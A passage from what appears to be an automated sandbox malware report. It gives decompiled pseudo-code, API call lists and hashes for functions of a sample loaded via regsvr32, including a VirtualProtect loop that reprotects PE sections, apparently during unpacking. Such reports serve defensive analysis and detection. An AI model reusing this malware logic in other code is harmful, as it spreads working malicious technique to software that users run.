                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,023E6814), ref: 023E74FB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: 7cf26d348235f896e8d0413c04e03651caf58cc2f8eeaf399a8dbecc01e1749a
                                                                                                                                                                                                                                    • Instruction ID: 5b292bcf45ff2d8b749c34cd8e1981b7dd0b253700401bb39d10f09b405d9f3b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cf26d348235f896e8d0413c04e03651caf58cc2f8eeaf399a8dbecc01e1749a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22317CB1E50128EEDF21ABA0DC44EAABBBDEF44314F150456E502AB1E0D3719A1DDF51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E8504, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                                                                                    			E023E8504(void* __ecx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t37;
				void* _t40;
				intOrPtr _t42;

				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x23ed340; // 0x4cc8d39
				_push(0x800);
				_push(0);
				_push( *0x23ed238);
				if( *0x23ed24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x23ed24c =  *0x23ed24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E023E2496(_t44, _t40); // executed
						_t18 = E023EA66E(_t37, _t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x23ed24c < 5) {
								 *0x23ed24c =  *0x23ed24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E023EA1B0();
						RtlFreeHeap( *0x23ed238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E023EA279(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E023E8B94(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}











                                                                                                                                                                                                                                    0x023e8504
                                                                                                                                                                                                                                    0x023e8507
                                                                                                                                                                                                                                    0x023e8508
                                                                                                                                                                                                                                    0x023e8512
                                                                                                                                                                                                                                    0x023e8519
                                                                                                                                                                                                                                    0x023e851e
                                                                                                                                                                                                                                    0x023e8520
                                                                                                                                                                                                                                    0x023e8526
                                                                                                                                                                                                                                    0x023e854e
                                                                                                                                                                                                                                    0x023e8566
                                                                                                                                                                                                                                    0x023e8568
                                                                                                                                                                                                                                    0x023e8569
                                                                                                                                                                                                                                    0x023e856b
                                                                                                                                                                                                                                    0x023e85a9
                                                                                                                                                                                                                                    0x023e85a9
                                                                                                                                                                                                                                    0x023e85af
                                                                                                                                                                                                                                    0x023e85b5
                                                                                                                                                                                                                                    0x023e85b5
                                                                                                                                                                                                                                    0x023e856d
                                                                                                                                                                                                                                    0x023e8573
                                                                                                                                                                                                                                    0x023e8576
                                                                                                                                                                                                                                    0x023e8585
                                                                                                                                                                                                                                    0x023e8587
                                                                                                                                                                                                                                    0x023e858e
                                                                                                                                                                                                                                    0x023e85c2
                                                                                                                                                                                                                                    0x023e85c7
                                                                                                                                                                                                                                    0x023e85c9
                                                                                                                                                                                                                                    0x023e85cb
                                                                                                                                                                                                                                    0x023e85cb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e85c9
                                                                                                                                                                                                                                    0x023e8590
                                                                                                                                                                                                                                    0x023e8595
                                                                                                                                                                                                                                    0x023e85a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e85a3
                                                                                                                                                                                                                                    0x023e855d
                                                                                                                                                                                                                                    0x023e8562
                                                                                                                                                                                                                                    0x023e8562
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e8562
                                                                                                                                                                                                                                    0x023e8530
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e853f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800,76D7F710), ref: 023E8528
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: GetTickCount.KERNEL32 ref: 023E8BA8
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: wsprintfA.USER32 ref: 023E8BF8
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: wsprintfA.USER32 ref: 023E8C15
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: wsprintfA.USER32 ref: 023E8C41
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: HeapFree.KERNEL32(00000000,?), ref: 023E8C53
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: wsprintfA.USER32 ref: 023E8C74
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: HeapFree.KERNEL32(00000000,?), ref: 023E8C84
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 023E8CB2
                                                                                                                                                                                                                                      • Part of subcall function 023E8B94: GetTickCount.KERNEL32 ref: 023E8CC3
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800,76D7F710), ref: 023E8546
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000002,023E685F,?,023E685F,00000002,?,?,023E2417,?), ref: 023E85A3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1676223858-0
                                                                                                                                                                                                                                    • Opcode ID: 14ad9a57e29369ffbb4d3ac98e0572c95bd9cc0f1ab58bdf380012f8a52a36c2
                                                                                                                                                                                                                                    • Instruction ID: a6d9b54d462d82fbfee791126425e0ec5a6ecd856f5885022b34f08f60d3118b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14ad9a57e29369ffbb4d3ac98e0572c95bd9cc0f1ab58bdf380012f8a52a36c2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA2171B1A50229EFCF21DF55D880F9A37ADEB48340F000416F9029B2D0DB70E919DFA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 026D1179, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E026D1179(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x26d414c;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}












                                                                                                                                                                                                                                    0x026d1183
                                                                                                                                                                                                                                    0x026d1190
                                                                                                                                                                                                                                    0x026d1196
                                                                                                                                                                                                                                    0x026d11a2
                                                                                                                                                                                                                                    0x026d11b2
                                                                                                                                                                                                                                    0x026d11b4
                                                                                                                                                                                                                                    0x026d11bc
                                                                                                                                                                                                                                    0x026d1251
                                                                                                                                                                                                                                    0x026d1258
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d11c2
                                                                                                                                                                                                                                    0x026d11c2
                                                                                                                                                                                                                                    0x026d11c2
                                                                                                                                                                                                                                    0x026d11c6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d11d2
                                                                                                                                                                                                                                    0x026d11d6
                                                                                                                                                                                                                                    0x026d11fa
                                                                                                                                                                                                                                    0x026d11fe
                                                                                                                                                                                                                                    0x026d1212
                                                                                                                                                                                                                                    0x026d1212
                                                                                                                                                                                                                                    0x026d1218
                                                                                                                                                                                                                                    0x026d1227
                                                                                                                                                                                                                                    0x026d122b
                                                                                                                                                                                                                                    0x026d1233
                                                                                                                                                                                                                                    0x026d1233
                                                                                                                                                                                                                                    0x026d123b
                                                                                                                                                                                                                                    0x026d123e
                                                                                                                                                                                                                                    0x026d124b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d124b
                                                                                                                                                                                                                                    0x026d1206
                                                                                                                                                                                                                                    0x026d120a
                                                                                                                                                                                                                                    0x026d1210
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d1210
                                                                                                                                                                                                                                    0x026d11de
                                                                                                                                                                                                                                    0x026d11e2
                                                                                                                                                                                                                                    0x026d11ec
                                                                                                                                                                                                                                    0x026d11e4
                                                                                                                                                                                                                                    0x026d11e4
                                                                                                                                                                                                                                    0x026d11e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x026d11e2
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 026D11B2
                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 026D1227
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 026D122D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.522835823.00000000026D0000.00000040.00020000.sdmp, Offset: 026D0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.523067360.00000000026D5000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_26d0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1469625949-0
                                                                                                                                                                                                                                    • Opcode ID: 00099efbcb56b0ba6efbeb169762142dbf61b8dd7a7263de86de018861a5064f
                                                                                                                                                                                                                                    • Instruction ID: 15be5ed43d8ee8b91498aee6f48bd5533a51e07decd870312b3f492aef95151c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00099efbcb56b0ba6efbeb169762142dbf61b8dd7a7263de86de018861a5064f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A217C31C0120AEFCB04CF95C8C1AAAF7F5FF09319F004899D00A97540E3B9A6A5CF90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E3DD9, Relevance: 3.9, APIs: 3, Instructions: 155stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                                    			E023E3DD9(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x23ed27c; // 0x28da5a8
				_t5 = _t40 + 0x23eee40; // 0x410025
				_t85 = E023E6A12(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E023E9039(_v16);
					goto L24;
				}
				if(E023EA72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E023E809F(0,  *0x23ed33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0x23ed27c; // 0x28da5a8
					_t11 = _t52 + 0x23ee81a; // 0x65696c43
					_t55 = E023E809F(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E023E6BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E023E9039(_t87);
					}
					if(_t80 != 0) {
						L17:
						E023E9039(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E023E1F99(_t86);
						}
						goto L22;
					} else {
						if(( *0x23ed260 & 0x00000001) == 0) {
							L14:
							E023E8F83(_t80, _v88, _v84,  *0x23ed270, 0);
							_t80 = E023E1C74(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E023E42EA( &_v40, 0);
							}
							E023E9039(_v88);
							goto L17;
						}
						_t67 =  *0x23ed27c; // 0x28da5a8
						_t18 = _t67 + 0x23ee823; // 0x65696c43
						_t70 = E023E809F(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E023E6BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E023E9039(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}


























                                                                                                                                                                                                                                    0x023e3deb
                                                                                                                                                                                                                                    0x023e3dee
                                                                                                                                                                                                                                    0x023e3df5
                                                                                                                                                                                                                                    0x023e3dfb
                                                                                                                                                                                                                                    0x023e3dfc
                                                                                                                                                                                                                                    0x023e3dfd
                                                                                                                                                                                                                                    0x023e3dfe
                                                                                                                                                                                                                                    0x023e3dff
                                                                                                                                                                                                                                    0x023e3e00
                                                                                                                                                                                                                                    0x023e3e08
                                                                                                                                                                                                                                    0x023e3e14
                                                                                                                                                                                                                                    0x023e3e18
                                                                                                                                                                                                                                    0x023e3e1b
                                                                                                                                                                                                                                    0x023e3f6b
                                                                                                                                                                                                                                    0x023e3f6e
                                                                                                                                                                                                                                    0x023e3f72
                                                                                                                                                                                                                                    0x023e3f72
                                                                                                                                                                                                                                    0x023e3e2d
                                                                                                                                                                                                                                    0x023e3e35
                                                                                                                                                                                                                                    0x023e3f5e
                                                                                                                                                                                                                                    0x023e3f5f
                                                                                                                                                                                                                                    0x023e3f62
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3f62
                                                                                                                                                                                                                                    0x023e3e47
                                                                                                                                                                                                                                    0x023e3e49
                                                                                                                                                                                                                                    0x023e3e49
                                                                                                                                                                                                                                    0x023e3e54
                                                                                                                                                                                                                                    0x023e3e5b
                                                                                                                                                                                                                                    0x023e3e5e
                                                                                                                                                                                                                                    0x023e3f4d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3e64
                                                                                                                                                                                                                                    0x023e3e64
                                                                                                                                                                                                                                    0x023e3e69
                                                                                                                                                                                                                                    0x023e3e72
                                                                                                                                                                                                                                    0x023e3e77
                                                                                                                                                                                                                                    0x023e3e80
                                                                                                                                                                                                                                    0x023e3ea3
                                                                                                                                                                                                                                    0x023e3e82
                                                                                                                                                                                                                                    0x023e3e98
                                                                                                                                                                                                                                    0x023e3e9a
                                                                                                                                                                                                                                    0x023e3e9a
                                                                                                                                                                                                                                    0x023e3ea6
                                                                                                                                                                                                                                    0x023e3f41
                                                                                                                                                                                                                                    0x023e3f44
                                                                                                                                                                                                                                    0x023e3f4e
                                                                                                                                                                                                                                    0x023e3f4e
                                                                                                                                                                                                                                    0x023e3f53
                                                                                                                                                                                                                                    0x023e3f55
                                                                                                                                                                                                                                    0x023e3f55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3eac
                                                                                                                                                                                                                                    0x023e3eb3
                                                                                                                                                                                                                                    0x023e3ef4
                                                                                                                                                                                                                                    0x023e3f05
                                                                                                                                                                                                                                    0x023e3f1b
                                                                                                                                                                                                                                    0x023e3f1f
                                                                                                                                                                                                                                    0x023e3f24
                                                                                                                                                                                                                                    0x023e3f2a
                                                                                                                                                                                                                                    0x023e3f37
                                                                                                                                                                                                                                    0x023e3f37
                                                                                                                                                                                                                                    0x023e3f3c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3f3c
                                                                                                                                                                                                                                    0x023e3eb5
                                                                                                                                                                                                                                    0x023e3eba
                                                                                                                                                                                                                                    0x023e3ec3
                                                                                                                                                                                                                                    0x023e3ec8
                                                                                                                                                                                                                                    0x023e3ecc
                                                                                                                                                                                                                                    0x023e3eef
                                                                                                                                                                                                                                    0x023e3ece
                                                                                                                                                                                                                                    0x023e3ee4
                                                                                                                                                                                                                                    0x023e3ee6
                                                                                                                                                                                                                                    0x023e3ee6
                                                                                                                                                                                                                                    0x023e3ef2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3ef2
                                                                                                                                                                                                                                    0x023e3ea6

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E3DEE
                                                                                                                                                                                                                                      • Part of subcall function 023E6A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,023E3E14,00410025,00000005,?,00000000), ref: 023E6A23
                                                                                                                                                                                                                                      • Part of subcall function 023E6A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 023E6A40
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 023E3E22
                                                                                                                                                                                                                                    • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 023E3E2D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3817122888-0
                                                                                                                                                                                                                                    • Opcode ID: 03ab03ba969a4daba3af2099c756e51df2e3767f52c84cec42e3cf9b6aba3425
                                                                                                                                                                                                                                    • Instruction ID: a46996d6b75b3f3ad32bc1fe1ed18e96c1752c38590d5218d5d1809f912a7991
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03ab03ba969a4daba3af2099c756e51df2e3767f52c84cec42e3cf9b6aba3425
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5414DB290122CAACF21EEE4CC849EE7BBDAF08744F004565E506EB190D771DE4D8B91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E9152, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E023E9152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E023E3AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x23ed27c; // 0x28da5a8
						_t20 = _t68 + 0x23ee1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E023E7C14(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                                                                                                                                                                    0x023e9158
                                                                                                                                                                                                                                    0x023e915b
                                                                                                                                                                                                                                    0x023e916b
                                                                                                                                                                                                                                    0x023e9174
                                                                                                                                                                                                                                    0x023e9178
                                                                                                                                                                                                                                    0x023e9246
                                                                                                                                                                                                                                    0x023e924c
                                                                                                                                                                                                                                    0x023e924c
                                                                                                                                                                                                                                    0x023e9192
                                                                                                                                                                                                                                    0x023e9197
                                                                                                                                                                                                                                    0x023e919b
                                                                                                                                                                                                                                    0x023e91a1
                                                                                                                                                                                                                                    0x023e91a6
                                                                                                                                                                                                                                    0x023e91ad
                                                                                                                                                                                                                                    0x023e91bc
                                                                                                                                                                                                                                    0x023e91bc
                                                                                                                                                                                                                                    0x023e91c0
                                                                                                                                                                                                                                    0x023e91c2
                                                                                                                                                                                                                                    0x023e91ce
                                                                                                                                                                                                                                    0x023e91d9
                                                                                                                                                                                                                                    0x023e91e4
                                                                                                                                                                                                                                    0x023e91e8
                                                                                                                                                                                                                                    0x023e91f2
                                                                                                                                                                                                                                    0x023e91f6
                                                                                                                                                                                                                                    0x023e91f8
                                                                                                                                                                                                                                    0x023e91fd
                                                                                                                                                                                                                                    0x023e9204
                                                                                                                                                                                                                                    0x023e9214
                                                                                                                                                                                                                                    0x023e9214
                                                                                                                                                                                                                                    0x023e91fd
                                                                                                                                                                                                                                    0x023e91f6
                                                                                                                                                                                                                                    0x023e9216
                                                                                                                                                                                                                                    0x023e921b
                                                                                                                                                                                                                                    0x023e9220
                                                                                                                                                                                                                                    0x023e9220
                                                                                                                                                                                                                                    0x023e9226
                                                                                                                                                                                                                                    0x023e922c
                                                                                                                                                                                                                                    0x023e9231
                                                                                                                                                                                                                                    0x023e9231
                                                                                                                                                                                                                                    0x023e9236
                                                                                                                                                                                                                                    0x023e923b
                                                                                                                                                                                                                                    0x023e923b
                                                                                                                                                                                                                                    0x023e9236
                                                                                                                                                                                                                                    0x023e91c0
                                                                                                                                                                                                                                    0x023e923d
                                                                                                                                                                                                                                    0x023e9243
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E3AEF: SysAllocString.OLEAUT32(80000002), ref: 023E3B46
                                                                                                                                                                                                                                      • Part of subcall function 023E3AEF: SysFreeString.OLEAUT32(00000000), ref: 023E3BAB
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 023E9231
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(023E1885), ref: 023E923B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$Free$Alloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 986138563-0
                                                                                                                                                                                                                                    • Opcode ID: 0ee8332359439ecd7df298dce70a3bb6acdc7ec0e9ad117d1426520cea129bf9
                                                                                                                                                                                                                                    • Instruction ID: 4040e0502194a3e8684ea1317fd5889d6f00b07029180c05bd567b6d24f9bdf6
